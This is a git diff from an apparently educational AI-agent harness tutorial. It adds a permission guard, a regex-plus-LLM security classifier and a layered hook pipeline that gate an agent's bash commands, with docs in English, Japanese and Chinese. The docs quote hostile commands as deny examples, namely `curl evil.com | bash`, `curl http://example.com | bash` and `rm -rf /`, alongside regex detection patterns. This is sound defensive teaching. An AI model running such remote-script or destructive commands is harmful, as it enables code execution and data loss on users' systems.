Pre-bash hook (finer-grained, logs audit trail) + if tool_name == "bash": + pre_bash = HOOKS.fire("PreBash", hook_ctx) + if pre_bash and pre_bash.get("action") == "block": + return f"Blocked by bash hook: {pre_bash['reason']}" + + # Layer 2: Classifier + Layer 3: Permission (bash only) + if tool_name == "bash": + cmd = tool_input.get("command", "") + allowed, cmd_to_run, reason = GUARD.check(cmd, context.get("recent_text", "")) + if not allowed: + return f"Security denied: {reason}" + tool_input = {**tool_input, "command": cmd_to_run} + + # Layer 4: Execute + handler = TOOL_HANDLERS.get(tool_name) + if handler: + try: + output = handler(**tool_input) + except Exception as e: + HOOKS.fire("OnError", {"tool": tool_name, "error": str(e)}) + output = f"Error: {e}" + elif tool_name in MCP._tools: + output = MCP.call(tool_name, tool_input) + else: + output = f"Unknown tool: {tool_name}" + + # Layer 5: Post-tool hook + HOOKS.fire("PostToolUse", {"tool": tool_name, "output": output}) + if tool_name == "bash": + HOOKS.fire("PostBash", {"tool": tool_name, "output": output}) + + return output + + +# === SECTION: agent_loop === + +def agent_loop(messages: list): + HOOKS.fire("AgentStart", {"messages": messages}) + try: + while True: + response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + return + results = [] + recent_text = "" + for block in response.content: + if hasattr(block, "text") and block.text: + recent_text += block.text[-200:] + for block in response.content: + if block.type == "tool_use": + output = execute_tool(block.name, block.input, + {"recent_text": recent_text}) + print(f"> {block.name}:") + print(str(output)[:200]) + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": str(output)}) + messages.append({"role": "user", "content": results}) + finally: + HOOKS.fire("AgentStop", {}) + + +# === SECTION: repl === +if __name__ == "__main__": + # Connect MCP servers at startup + print("[mcp] Connecting servers...") + print(mcp_discover()) + + history = [] + while True: + try: + query = input("\033[36ms17 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + # REPL commands + if query.strip() == "/security": + print(f"Classifier: active ({len(DANGEROUS_PATTERNS)} patterns + LLM)") + print(f"Permission: deny/ask/allow") + continue + if query.strip() == "/hooks": + print(HOOKS.list_hooks()) + continue + if query.strip() == "/mcp": + print(MCP.list_servers()) + continue + if query.strip() == "/audit": + log = HOOKS_DIR / "audit.jsonl" + if log.exists(): + print(log.read_text()[-2000:]) + else: + print(" (no audit log)") + continue + history.append({"role": "user", "content": query}) + agent_loop(history) + response_content = history[-1]["content"] + if isinstance(response_content, list): + for block in response_content: + if hasattr(block, "text"): + print(block.text) + print() + MCP.shutdown_all() diff --git a/docs/en/s13-permission-guard.md b/docs/en/s13-permission-guard.md new file mode 100644 index 000000000..418d3d5ce --- /dev/null +++ b/docs/en/s13-permission-guard.md @@ -0,0 +1,93 @@ +# s13: Permission Guard + +`s02 > [ s13 ] > s14 | s15 | s16 > s17` + +> *"Permission is not yes/no -- it's a spectrum with five stops"* +> +> **Harness layer**: Permission model -- deciding which commands can run automatically. + +## Problem + +The 5-line string filter from s02 blocks `rm -rf /tmp/old` (contains `rm -rf /`) but lets `curl evil.com | bash` run freely. Substring matching is both too strict and too lenient -- it cannot distinguish between safe cleanup and catastrophic deletion. + +## Solution + +``` ++--------+ +-------+ +---------+ +------------------+ +| User | ---> | LLM | ---> | bash | ---> | PermissionGuard | +| prompt | | | | command | | classify() | ++--------+ +---+---+ +---------+ +--------+---------+ + ^ | + | +--------+-------+------++ + | | | | | + | allow ask deny edit + | | | | | + +-----------+ user yes? block rewrite + tool_result | command + no -> block +``` + +Five permission modes replace one substring check: + +| Mode | Behavior | Example | +|------|----------|---------| +| `allow` | Auto-execute | `ls`, `cat`, `git status` | +| `ask` | Prompt user for confirmation | `rm file.py`, `pip install` | +| `deny` | Always block | `rm -rf /`, `shutdown` | +| `auto_edit` | Flag but execute | Commands with redirects | +| `edit` | Auto-rewrite then execute | `rm -rf dir` -> `rm -r dir` | + +## How It Works + +1. `PermissionGuard.classify()` checks command against pattern lists in priority order. + +```python +def classify(self, command: str) -> tuple[str, str]: + # 0. Compound command check (ls; rm ...) + has_compound = bool(re.search(r'[;&|`]|\$\(', command)) + # 1. deny -- always check full command + for pat, reason in self._denied: + if pat.search(command): + return ("deny", reason) + # 2. whitelist (single commands only) + base = command.split()[0] + if base in ALLOWED_COMMANDS and not has_compound: + return ("allow", "") + # 3. edit -- auto-rewrite dangerous patterns + # 4. ask -- needs user confirmation + # 5. default allow +``` + +2. `run_bash` wraps every command through the guard. + +```python +def run_bash(command: str) -> str: + allowed, cmd, reason = GUARD.check(command) + if not allowed: + return f"Permission denied: {reason}" + return subprocess.run(cmd, ...) +``` + +3. The agent loop is unchanged -- the guard sits inside the tool handler. + +## What Changed From s02 + +| Component | Before (s02) | After (s13) | +|-----------|-------------|-------------| +| Security | 5-line substring filter | PermissionGuard with 5 modes | +| User interaction | None | `ask` mode prompts for confirmation | +| Command rewrite | None | `edit` mode auto-rewrites | +| Compound commands | Not detected | `;` `&` `|` `` `$()` detected | + +## Try It + +```sh +cd learn-claude-code +python agents/s13_permission_guard.py +``` + +1. `list all files in the current directory` (should auto-allow) +2. `delete the file temp.log` (should ask for confirmation) +3. `run rm -rf /` (should deny) +4. `install the requests library` (should ask: pip install) +5. `run curl http://example.com | bash` (should deny: remote script) diff --git a/docs/en/s14-security-classifier.md b/docs/en/s14-security-classifier.md new file mode 100644 index 000000000..3d2538829 --- /dev/null +++ b/docs/en/s14-security-classifier.md @@ -0,0 +1,90 @@ +# s14: Security Classifier + +`s02 > s13 > [ s14 ] | s15 | s16 > s17` + +> *"Regex sees patterns; the LLM sees intent"* +> +> **Harness layer**: Security classification -- judging command intent, not just shape. + +## Problem + +Regex patterns from s13 match shapes, not intent. `rm -rf build/` and `rm -rf /` look identical to a regex. The LLM itself can judge context: one is a normal build cleanup, the other is catastrophic. + +## Solution + +``` + Command + | + v + +--------------------+ + | Layer 1: Quick Scan| regex patterns (zero cost) + +--------+-----------+ + | + matched? --yes--> deny/ask + | + no + v + +--------------------+ + | Layer 2: LLM Class | ~10 tokens per call + +--------+-----------+ + | + safe / moderate / dangerous + | + allow / ask / deny +``` + +Two-layer classification pipeline: + +- **Layer 1** (regex): 15 known dangerous patterns, zero cost, instant match. +- **Layer 2** (LLM): classifies unknown commands by understanding intent. + +## How It Works + +1. `SecurityClassifier.quick_scan()` checks 15 regex patterns in O(1). + +```python +DANGEROUS_PATTERNS = [ + (re.compile(r"rm\s+-rf\s+/(?!\w)"), "Root recursive delete"), + (re.compile(r"sudo\s+"), "Elevated privileges"), + (re.compile(r"curl.*\|\s*(ba)?sh"), "Remote code execution"), + # ... 12 more patterns +] +``` + +2. `SecurityClassifier.llm_classify()` sends the command to the LLM for intent analysis. + +```python +def llm_classify(self, command: str, context: str = "") -> str: + resp = self.client.messages.create( + model=self.model, + messages=[{"role": "user", "content": + f"Classify: {command}\nContext: {context}\n" + f"Reply: safe, moderate, or dangerous"}], + max_tokens=10, + ) + return resp.content[0].text.strip().lower() +``` + +3. `classify()` runs the full pipeline: quick-scan -> whitelist -> LLM. + +## What Changed From s13 + +| Component | Before (s13) | After (s14) | +|-----------|-------------|-------------| +| Classification | Regex pattern matching only | Regex quick-scan + LLM classification | +| Unknown commands | Default allow | LLM judges safe/moderate/dangerous | +| False positives | High (`rm -rf build/` blocked) | Low (LLM understands intent) | +| Cost | Zero | Whitelist zero + LLM ~10 tokens/call | + +## Try It + +```sh +cd learn-claude-code +python agents/s14_security_classifier.py +``` + +1. `delete the build/ directory` (LLM should judge as moderate -> ask) +2. `list all python files` (whitelist -> allow) +3. `run git push --force origin main` (regex pattern -> deny) +4. `run pip install numpy` (LLM should judge as moderate -> ask) +5. `create a new file called test.py` (LLM should judge as safe -> allow) diff --git a/docs/en/s17-secure-extension-harness.md b/docs/en/s17-secure-extension-harness.md new file mode 100644 index 000000000..8039963c2 --- /dev/null +++ b/docs/en/s17-secure-extension-harness.md @@ -0,0 +1,103 @@ +# s17: Secure Extension Harness + +`s02 > s13 > s14 | s15 | s16 > [ s17 ]` + +> *"Production harnesses aren't about more features -- they're about clear responsibilities at every layer"* +> +> **Harness layer**: Security pipeline -- composing all defense layers into one execution path. + +## Problem + +s13-s16 each runs as a standalone agent. Real systems need all layers working together inside a single execution pipeline. The question: how do they compose without conflicting? + +## Solution + +``` + LLM calls tool + | + v + +---------------------+ + | [1] Pre-tool Hook | --block--> return error + +----------+----------+ + v + +---------------------+ + | [2] Classifier | --deny---> return error + +----------+----------+ + v + +---------------------+ + | [3] Permission | --deny---> return error + | | --ask---> user confirm? + +----------+----------+ + v + +---------------------+ + | [4] Execute | built-in handler or MCP + +----------+----------+ + v + +---------------------+ + | [5] Post-tool Hook | observe / log + +----------+----------+ + | + v + return result +``` + +Each layer answers exactly one question: + +| Layer | Question | Source | +|-------|----------|--------| +| Hook | "Should this action be intercepted?" | s15 | +| Classifier | "What is this command's intent?" | s14 | +| Permission | "Is this intent allowed?" | s13 | +| Execute | "Run and return result" | s02 + s16 | + +## How It Works + +1. `execute_tool()` runs the 5-layer pipeline for every tool call. + +```python +def execute_tool(tool_name, tool_input, context): + # Layer 1: Pre-tool hook + pre = HOOKS.fire("PreToolUse", {"tool": tool_name, "input": tool_input}) + if pre and pre.get("action") == "block": + return f"Blocked by hook: {pre['reason']}" + + # Layer 2+3: Classifier + Permission (bash only) + if tool_name == "bash": + allowed, cmd, reason = GUARD.check(command) + if not allowed: + return f"Security denied: {reason}" + + # Layer 4: Execute + handler = TOOL_HANDLERS.get(tool_name) + output = handler(**tool_input) if handler else MCP.call(tool_name, tool_input) + + # Layer 5: Post-tool hook + HOOKS.fire("PostToolUse", {"tool": tool_name, "output": output}) + return output +``` + +2. Each layer is independent -- remove any one and the others still work. + +3. REPL commands: `/security`, `/hooks`, `/mcp`, `/audit`. + +## What Changed From s16 + +| Component | Before (s13-s16 standalone) | After (s17) | +|-----------|----------------------------|-------------| +| Security pipeline | Each chapter runs alone | Unified `execute_tool` pipeline | +| Classifier | Standalone | Embedded in Hook -> Classify -> Permission flow | +| Hooks | Standalone | First and last layer of the pipeline | +| MCP | Standalone | Part of the Execute layer | + +## Try It + +```sh +cd learn-claude-code +python agents/s17_secure_extension_harness.py +``` + +1. `list all python files` (all layers pass -> allow) +2. `run rm -rf /` (classifier deny -> blocked) +3. `write a test file and show audit log` (PostToolUse hook logs -> `/audit`) +4. `search for 'PermissionGuard' via MCP` (MCP tool called through pipeline) +5. `register a hook that blocks all pip commands` (dynamic hook registration) diff --git a/docs/ja/s13-permission-guard.md b/docs/ja/s13-permission-guard.md new file mode 100644 index 000000000..d0fded0ba --- /dev/null +++ b/docs/ja/s13-permission-guard.md @@ -0,0 +1,51 @@ +# s13: Permission Guard (権限ガード) + +`s02 > [ s13 ] > s14 | s15 | s16 > s17` + +> *"権限はイエス/ノーではない -- 5つの停留所を持つスペクトラムである"* +> +> **Harness 層**: 権限モデル -- どのコマンドが自動実行できるかを決定。 + +## 問題 + +s02の5行の文字列フィルターは `rm -rf /tmp/old` を誤ってブロックし(`rm -rf /` を含むため)、`curl evil.com | bash` を自由に実行させてしまう。部分文字列マッチングは厳しすぎたり緩すぎたりする。 + +## 解決策 + +5つの権限モードが1つの部分文字列チェックに取って代わる: + +| モード | 動作 | 例 | +|--------|------|-----| +| `allow` | 自動実行 | `ls`, `cat`, `git status` | +| `ask` | ユーザーに確認 | `rm file.py`, `pip install` | +| `deny` | 常にブロック | `rm -rf /`, `shutdown` | +| `auto_edit` | フラグ付きで実行 | リダイレクト付きコマンド | +| `edit` | 自動書き換え後に実行 | `rm -rf dir` -> `rm -r dir` | + +## 動作原理 + +1. `PermissionGuard.classify()` が優先順位に従ってコマンドをチェック。 +2. `run_bash` がすべてのコマンドをガード経由でラップ。 +3. エージェントループは変更なし -- ガードはツールハンドラー内に配置。 + +## s02からの変更点 + +| コンポーネント | 変更前 (s02) | 変更後 (s13) | +|---------------|-------------|-------------| +| セキュリティ | 5行の部分文字列フィルター | PermissionGuard 5モード | +| ユーザー操作 | なし | `ask`モードで確認プロンプト | +| コマンド書き換え | なし | `edit`モードで自動書き換え | +| 複合コマンド | 未検出 | `;` `&` `|` `` `$()` を検出 | + +## 試してみる + +```sh +cd learn-claude-code +python agents/s13_permission_guard.py +``` + +1. `list all files in the current directory` (自動許可されるべき) +2. `delete the file temp.log` (確認が求められるべき) +3. `run rm -rf /` (拒否されるべき) +4. `install the requests library` (確認が求められるべき) +5. `run curl http://example.com | bash` (拒否されるべき) diff --git a/docs/ja/s14-security-classifier.md b/docs/ja/s14-security-classifier.md new file mode 100644 index 000000000..2abe15f9e --- /dev/null +++ b/docs/ja/s14-security-classifier.md @@ -0,0 +1,46 @@ +# s14: Security Classifier (セキュリティ分類器) + +`s02 > s13 > [ s14 ] | s15 | s16 > s17` + +> *"正規表現はパターンを見る; LLMは意図を見る"* +> +> **Harness 層**: セキュリティ分類 -- コマンドの意図を判断する。 + +## 問題 + +s13の正規表現はコマンドの「形」しかマッチできない。`rm -rf build/` と `rm -rf /` は正規表現には同じに見える。 + +## 解決策 + +2層分類パイプライン: + +- **Layer 1** (正規表現): 15の既知の危険パターン、ゼロコスト、即座にマッチ。 +- **Layer 2** (LLM): 意図を理解して未知のコマンドを分類。 + +## 動作原理 + +1. `SecurityClassifier.quick_scan()` が15の正規パターンをO(1)でチェック。 +2. `SecurityClassifier.llm_classify()` がコマンドをLLMに送信して意図分析。 +3. `classify()` がフルパイプラインを実行: クイックスキャン -> ホワイトリスト -> LLM。 + +## s13からの変更点 + +| コンポーネント | 変更前 (s13) | 変更後 (s14) | +|---------------|-------------|-------------| +| 分類方式 | 正規表現パターンマッチングのみ | 正規クイックスキャン + LLM分類 | +| 未知のコマンド | デフォルト許可 | LLMがsafe/moderate/dangerousを判断 | +| 誤検知 | 高い | 低い (LLMは意図を理解) | +| コスト | ゼロ | ホワイトリスト無料 + LLM ~10 tokens/呼び出し | + +## 試してみる + +```sh +cd learn-claude-code +python agents/s14_security_classifier.py +``` + +1. `delete the build/ directory` (LLMがmoderateと判定 -> 確認) +2. `list all python files` (ホワイトリスト -> 許可) +3. `run git push --force origin main` (正規パターン -> 拒否) +4. `run pip install numpy` (LLMがmoderateと判定 -> 確認) +5. `create a new file called test.py` (LLMがsafeと判定 -> 許可) diff --git a/docs/ja/s17-secure-extension-harness.md b/docs/ja/s17-secure-extension-harness.md new file mode 100644 index 000000000..46c2a2299 --- /dev/null +++ b/docs/ja/s17-secure-extension-harness.md @@ -0,0 +1,50 @@ +# s17: Secure Extension Harness (セキュア拡張ハーネス) + +`s02 > s13 > s14 | s15 | s16 > [ s17 ]` + +> *"プロダクションハーネスの核心は機能の多さではなく、各層の責任の明確さにある"* +> +> **Harness 層**: セキュリティパイプライン -- すべての防御層を1つの実行パスに構成。 + +## 問題 + +s13-s16はそれぞれスタンドアロンのエージェントとして動作する。本番システムではすべての層が単一の実行パイプライン内で連携する必要がある。 + +## 解決策 + +各層は1つの質問にのみ答える: + +| 層 | 質問 | 出典 | +|----|------|------| +| Hook | "このアクションを傍受すべきか?" | s15 | +| 分類器 | "このコマンドの意図は何か?" | s14 | +| 権限 | "この意図は許可されるか?" | s13 | +| 実行 | "実行して結果を返す" | s02 + s16 | + +## 動作原理 + +1. `execute_tool()` がすべてのツール呼び出しに対して5層パイプラインを実行。 +2. 各層は独立 -- どれか1つを削除しても他は動作する。 +3. REPLコマンド: `/security`, `/hooks`, `/mcp`, `/audit`。 + +## s16からの変更点 + +| コンポーネント | 変更前 (s13-s16単体) | 変更後 (s17) | +|---------------|---------------------|-------------| +| セキュリティパイプライン | 各章が単独で実行 | 統合`execute_tool`パイプライン | +| 分類器 | 単独実行 | Hook -> Classify -> Permissionフローに組み込み | +| Hooks | 単独実行 | パイプラインの最初と最後の層 | +| MCP | 単独実行 | パイプライン実行層の一部 | + +## 試してみる + +```sh +cd learn-claude-code +python agents/s17_secure_extension_harness.py +``` + +1. `list all python files` (全層通過 -> 許可) +2. `run rm -rf /` (分類器が拒否 -> ブロック) +3. `write a test file and show audit log` (PostToolUseフックが記録 -> `/audit`) +4. `search for 'PermissionGuard' via MCP` (MCPツールがパイプライン経由で呼ばれる) +5. `register a hook that blocks all pip commands` (動的フック登録) diff --git a/docs/zh/s13-permission-guard.md b/docs/zh/s13-permission-guard.md new file mode 100644 index 000000000..ec2d94b26 --- /dev/null +++ b/docs/zh/s13-permission-guard.md @@ -0,0 +1,93 @@ +# s13: Permission Guard (权限守卫) + +`s02 > [ s13 ] > s14 | s15 | s16 > s17` + +> *"权限不是是/否 -- 它是五个停靠点的光谱"* +> +> **Harness 层**: 权限模型 -- 决定哪些命令可以自动执行。 + +## 问题 + +s02 的 5 行字符串过滤会误拦 `rm -rf /tmp/old`(包含 `rm -rf /`),却放任 `curl evil.com | bash` 执行。子串匹配既过于严格又过于宽松 -- 它无法区分安全清理和灾难性删除。 + +## 解决方案 + +``` ++--------+ +-------+ +---------+ +------------------+ +| User | ---> | LLM | ---> | bash | ---> | PermissionGuard | +| prompt | | | | command | | classify() | ++--------+ +---+---+ +---------+ +--------+---------+ + ^ | + | +--------+-------+------++ + | | | | | + | allow ask deny edit + | | | | | + +-----------+ 用户确认? 拦截 改写命令 + tool_result | command + 拒绝 -> 拦截 +``` + +五种权限模式替代一条子串检查: + +| 模式 | 行为 | 示例 | +|------|------|------| +| `allow` | 自动执行 | `ls`, `cat`, `git status` | +| `ask` | 弹窗让用户确认 | `rm file.py`, `pip install` | +| `deny` | 始终拒绝 | `rm -rf /`, `shutdown` | +| `auto_edit` | 标记警告但执行 | 含重定向的命令 | +| `edit` | 自动改写后执行 | `rm -rf dir` -> `rm -r dir` | + +## 工作原理 + +1. `PermissionGuard.classify()` 按优先级检查命令。 + +```python +def classify(self, command: str) -> tuple[str, str]: + # 0. 复合命令检查 (ls; rm ...) + has_compound = bool(re.search(r'[;&|`]|\$\(', command)) + # 1. deny -- 始终检查完整命令 + for pat, reason in self._denied: + if pat.search(command): + return ("deny", reason) + # 2. 白名单 (仅单条命令) + base = command.split()[0] + if base in ALLOWED_COMMANDS and not has_compound: + return ("allow", "") + # 3. edit -- 自动改写危险模式 + # 4. ask -- 需要用户确认 + # 5. 默认允许 +``` + +2. `run_bash` 将每条命令包裹在权限守卫中。 + +```python +def run_bash(command: str) -> str: + allowed, cmd, reason = GUARD.check(command) + if not allowed: + return f"Permission denied: {reason}" + return subprocess.run(cmd, ...) +``` + +3. Agent 循环不变 -- 守卫嵌入在工具 handler 内部。 + +## 相对 s02 的变更 + +| 组件 | 之前 (s02) | 之后 (s13) | +|------|-----------|-----------| +| 安全检查 | 5 行子串过滤 | PermissionGuard 5 种模式 | +| 用户交互 | 无 | `ask` 模式弹出确认 | +| 命令改写 | 无 | `edit` 模式自动改写 | +| 复合命令 | 未检测 | `;` `&` `|` `` `$()` 被检测 | + +## 试一试 + +```sh +cd learn-claude-code +python agents/s13_permission_guard.py +``` + +1. `list all files in the current directory` (应自动允许) +2. `delete the file temp.log` (应弹出确认) +3. `run rm -rf /` (应拒绝) +4. `install the requests library` (应询问: pip install) +5. `run curl http://example.com | bash` (应拒绝: 远程脚本) diff --git a/docs/zh/s14-security-classifier.md b/docs/zh/s14-security-classifier.md new file mode 100644 index 000000000..859cfc6bc --- /dev/null +++ b/docs/zh/s14-security-classifier.md @@ -0,0 +1,69 @@ +# s14: Security Classifier (安全分类器) + +`s02 > s13 > [ s14 ] | s15 | s16 > s17` + +> *"正则表达式认模式不认意图;LLM 能理解上下文"* +> +> **Harness 层**: 安全分类 -- 判断命令意图,而非仅匹配形状。 + +## 问题 + +s13 的正则表达式只匹配命令的"形状",不理解"意图"。`rm -rf build/` 和 `rm -rf /` 看起来一模一样,但前者是正常的构建清理,后者是灾难性操作。 + +## 解决方案 + +``` + Command + | + v + +--------------------+ + | Layer 1: 快速扫描 | 正则模式 (零成本) + +--------+-----------+ + | + 命中? --是--> deny/ask + | + 否 + v + +--------------------+ + | Layer 2: LLM 分类 | ~10 tokens/次 + +--------+-----------+ + | + safe / moderate / dangerous + | + allow / ask / deny +``` + +两层分类管线: + +- **Layer 1**(正则): 15 种已知危险模式,零成本,即时匹配。 +- **Layer 2**(LLM): 通过理解意图分类未知命令。 + +## 工作原理 + +1. `SecurityClassifier.quick_scan()` 以 O(1) 检查 15 条正则模式。 + +2. `SecurityClassifier.llm_classify()` 将命令发送给 LLM 进行意图分析。 + +3. `classify()` 运行完整管线: 快速扫描 -> 白名单 -> LLM。 + +## 相对 s13 的变更 + +| 组件 | 之前 (s13) | 之后 (s14) | +|------|-----------|-----------| +| 分类方式 | 仅正则模式匹配 | 正则快筛 + LLM 分类 | +| 未知命令 | 默认 allow | LLM 判断 safe/moderate/dangerous | +| 误判率 | 高(`rm -rf build/` 被拦) | 低(LLM 理解意图) | +| 成本 | 零 | 白名单零成本 + LLM ~10 tokens/次 | + +## 试一试 + +```sh +cd learn-claude-code +python agents/s14_security_classifier.py +``` + +1. `delete the build/ directory` (LLM 应判断为 moderate -> ask) +2. `list all python files` (白名单 -> allow) +3. `run git push --force origin main` (正则模式 -> deny) +4. `run pip install numpy` (LLM 应判断为 moderate -> ask) +5. `create a new file called test.py` (LLM 应判断为 safe -> allow) diff --git a/docs/zh/s17-secure-extension-harness.md b/docs/zh/s17-secure-extension-harness.md new file mode 100644 index 000000000..da0af1382 --- /dev/null +++ b/docs/zh/s17-secure-extension-harness.md @@ -0,0 +1,81 @@ +# s17: Secure Extension Harness (安全扩展总成) + +`s02 > s13 > s14 | s15 | s16 > [ s17 ]` + +> *"生产级 Harness 的核心不是功能多,而是各层职责清晰"* +> +> **Harness 层**: 安全管线 -- 将所有防御层组合为一条执行路径。 + +## 问题 + +s13-s16 各自是一个能独立运行的 Agent。真实系统需要所有层在一条执行管线中协同工作。问题在于:如何组合而不冲突? + +## 解决方案 + +``` + LLM 调用工具 + | + v + +---------------------+ + | [1] Pre-tool Hook | --block--> 返回错误 + +----------+----------+ + v + +---------------------+ + | [2] 分类器 | --deny---> 返回错误 + +----------+----------+ + v + +---------------------+ + | [3] 权限检查 | --deny---> 返回错误 + | | --ask---> 用户确认? + +----------+----------+ + v + +---------------------+ + | [4] 执行 | 内建 handler 或 MCP + +----------+----------+ + v + +---------------------+ + | [5] Post-tool Hook | 观察 / 日志 + +----------+----------+ + | + v + 返回结果 +``` + +每一层只回答一个问题: + +| 层 | 问题 | 来源 | +|----|------|------| +| Hook | "这个动作需要被拦截吗?" | s15 | +| 分类器 | "这个命令的意图是什么?" | s14 | +| 权限 | "这个意图被允许吗?" | s13 | +| 执行 | "执行并返回结果" | s02 + s16 | + +## 工作原理 + +1. `execute_tool()` 对每次工具调用运行 5 层管线。 + +2. 每层独立 -- 移除任何一层,其他层不受影响。 + +3. REPL 命令: `/security`, `/hooks`, `/mcp`, `/audit`。 + +## 相对 s16 的变更 + +| 组件 | 之前 (s13-s16 独立) | 之后 (s17) | +|------|-------------------|-----------| +| 安全管线 | 各章独立运行 | 统一 `execute_tool` 管线 | +| 分类器 | 独立运行 | 嵌入 Hook -> Classify -> Permission 流程 | +| Hooks | 独立运行 | 作为管线第一层和最后一层 | +| MCP | 独立运行 | 作为管线执行层的一部分 | + +## 试一试 + +```sh +cd learn-claude-code +python agents/s17_secure_extension_harness.py +``` + +1. `list all python files` (所有层通过 -> allow) +2. `run rm -rf /` (分类器拒绝 -> 被拦截) +3. `write a test file and show audit log` (PostToolUse hook 记录 -> `/audit`) +4. `search for 'PermissionGuard' via MCP` (MCP 工具通过管线调用) +5. `register a hook that blocks all pip commands` (动态 hook 注册) diff --git a/web/src/components/architecture/execution-flow.tsx b/web/src/components/architecture/execution-flow.tsx index efeb1b77f..b1ea89d38 100644 --- a/web/src/components/architecture/execution-flow.tsx +++ b/web/src/components/architecture/execution-flow.tsx @@ -21,23 +21,56 @@ function getNodeCenter(node: FlowNode): { cx: number; cy: number } { return { cx: node.x, cy: node.y }; } -function getEdgePath(from: FlowNode, to: FlowNode): string { - const { cx: x1, cy: y1 } = getNodeCenter(from); - const { cx: x2, cy: y2 } = getNodeCenter(to); +const LOOP_LX = 20; +const LOOP_PAD = 15; + +function isLoopBack(from: FlowNode, to: FlowNode): boolean { + return to.y < from.y - 100; +} - const halfH = from.type === "decision" ? DIAMOND_SIZE / 2 : NODE_HEIGHT / 2; +function getEdgePath(from: FlowNode, to: FlowNode): string { + const x1 = from.x, y1 = from.y, x2 = to.x, y2 = to.y; + const halfHFrom = from.type === "decision" ? DIAMOND_SIZE / 2 : NODE_HEIGHT / 2; const halfHTo = to.type === "decision" ? DIAMOND_SIZE / 2 : NODE_HEIGHT / 2; + const halfWFrom = from.type === "decision" ? DIAMOND_SIZE / 2 : NODE_WIDTH / 2; + const halfWTo = to.type === "decision" ? DIAMOND_SIZE / 2 : NODE_WIDTH / 2; + + // Loop-back: route along left side + if (isLoopBack(from, to)) { + const startY = y1 + halfHFrom; + const endY = y2 - halfHTo; + return `M ${x1} ${startY} L ${x1} ${startY + LOOP_PAD} L ${LOOP_LX} ${startY + LOOP_PAD} L ${LOOP_LX} ${endY - LOOP_PAD} L ${x2} ${endY - LOOP_PAD} L ${x2} ${endY}`; + } + // Same column: vertical if (Math.abs(x1 - x2) < 10) { - const startY = y1 + halfH; + const startY = y1 + halfHFrom; const endY = y2 - halfHTo; return `M ${x1} ${startY} L ${x2} ${endY}`; } - const startY = y1 + halfH; + // Same row: horizontal side-to-side + if (Math.abs(y1 - y2) < NODE_HEIGHT) { + const midY = (y1 + y2) / 2; + const sx = x1 < x2 ? x1 + halfWFrom : x1 - halfWFrom; + const ex = x1 < x2 ? x2 - halfWTo : x2 + halfWTo; + return `M ${sx} ${midY} L ${ex} ${midY}`; + } + + // Different rows & columns: use bezier curves instead of L-shapes + // Curves from the same node naturally separate, avoiding overlap + const startY = y1 + halfHFrom; const endY = y2 - halfHTo; - const midY = (startY + endY) / 2; - return `M ${x1} ${startY} L ${x1} ${midY} L ${x2} ${midY} L ${x2} ${endY}`; + const gap = endY - startY; + + if (gap > 30) { + const midY = (startY + endY) / 2; + return `M ${x1} ${startY} C ${x1} ${midY}, ${x2} ${midY}, ${x2} ${endY}`; + } + + // Tight gap or going up: curve below then across + const routeY = Math.max(startY, y2 + halfHTo) + 20; + return `M ${x1} ${startY} C ${x1} ${routeY}, ${x2} ${routeY}, ${x2} ${endY}`; } function NodeShape({ node }: { node: FlowNode }) { diff --git a/web/src/components/layout/sidebar.tsx b/web/src/components/layout/sidebar.tsx index 7d2f6d90d..a88b1feee 100644 --- a/web/src/components/layout/sidebar.tsx +++ b/web/src/components/layout/sidebar.tsx @@ -12,6 +12,7 @@ const LAYER_DOT_BG: Record = { memory: "bg-purple-500", concurrency: "bg-amber-500", collaboration: "bg-red-500", + security: "bg-cyan-500", }; export function Sidebar() { diff --git a/web/src/components/simulator/agent-loop-simulator.tsx b/web/src/components/simulator/agent-loop-simulator.tsx index 8de470cd4..a495af87c 100644 --- a/web/src/components/simulator/agent-loop-simulator.tsx +++ b/web/src/components/simulator/agent-loop-simulator.tsx @@ -21,6 +21,9 @@ const scenarioModules: Record Promise<{ default: Scenario }>> = { s10: () => import("@/data/scenarios/s10.json") as Promise<{ default: Scenario }>, s11: () => import("@/data/scenarios/s11.json") as Promise<{ default: Scenario }>, s12: () => import("@/data/scenarios/s12.json") as Promise<{ default: Scenario }>, + s13: () => import("@/data/scenarios/s13.json") as Promise<{ default: Scenario }>, + s14: () => import("@/data/scenarios/s14.json") as Promise<{ default: Scenario }>, + s17: () => import("@/data/scenarios/s17.json") as Promise<{ default: Scenario }>, }; interface AgentLoopSimulatorProps { diff --git a/web/src/components/simulator/simulator-message.tsx b/web/src/components/simulator/simulator-message.tsx index 2984e3d49..e9aa2924b 100644 --- a/web/src/components/simulator/simulator-message.tsx +++ b/web/src/components/simulator/simulator-message.tsx @@ -3,7 +3,7 @@ import { motion } from "framer-motion"; import { cn } from "@/lib/utils"; import type { SimStep } from "@/types/agent-data"; -import { User, Bot, Terminal, ArrowRight, AlertCircle } from "lucide-react"; +import { User, Bot, Terminal, ArrowRight, AlertCircle, Shield, Zap, Search } from "lucide-react"; interface SimulatorMessageProps { step: SimStep; @@ -44,6 +44,24 @@ const TYPE_CONFIG: Record< bgClass: "bg-purple-50 dark:bg-purple-950/30", borderClass: "border-purple-200 dark:border-purple-800", }, + permission_check: { + icon: Shield, + label: "Permission", + bgClass: "bg-yellow-50 dark:bg-yellow-950/30", + borderClass: "border-yellow-200 dark:border-yellow-800", + }, + classifier_check: { + icon: Search, + label: "Classifier", + bgClass: "bg-orange-50 dark:bg-orange-950/30", + borderClass: "border-orange-200 dark:border-orange-800", + }, + hook_fire: { + icon: Zap, + label: "Hook", + bgClass: "bg-cyan-50 dark:bg-cyan-950/30", + borderClass: "border-cyan-200 dark:border-cyan-800", + }, }; export function SimulatorMessage({ step, index }: SimulatorMessageProps) { @@ -77,7 +95,7 @@ export function SimulatorMessage({ step, index }: SimulatorMessageProps) {
           {step.content || "(empty)"}
         
- ) : step.type === "system_event" ? ( + ) : step.type === "system_event" || step.type === "permission_check" || step.type === "classifier_check" || step.type === "hook_fire" ? (
           {step.content}
         
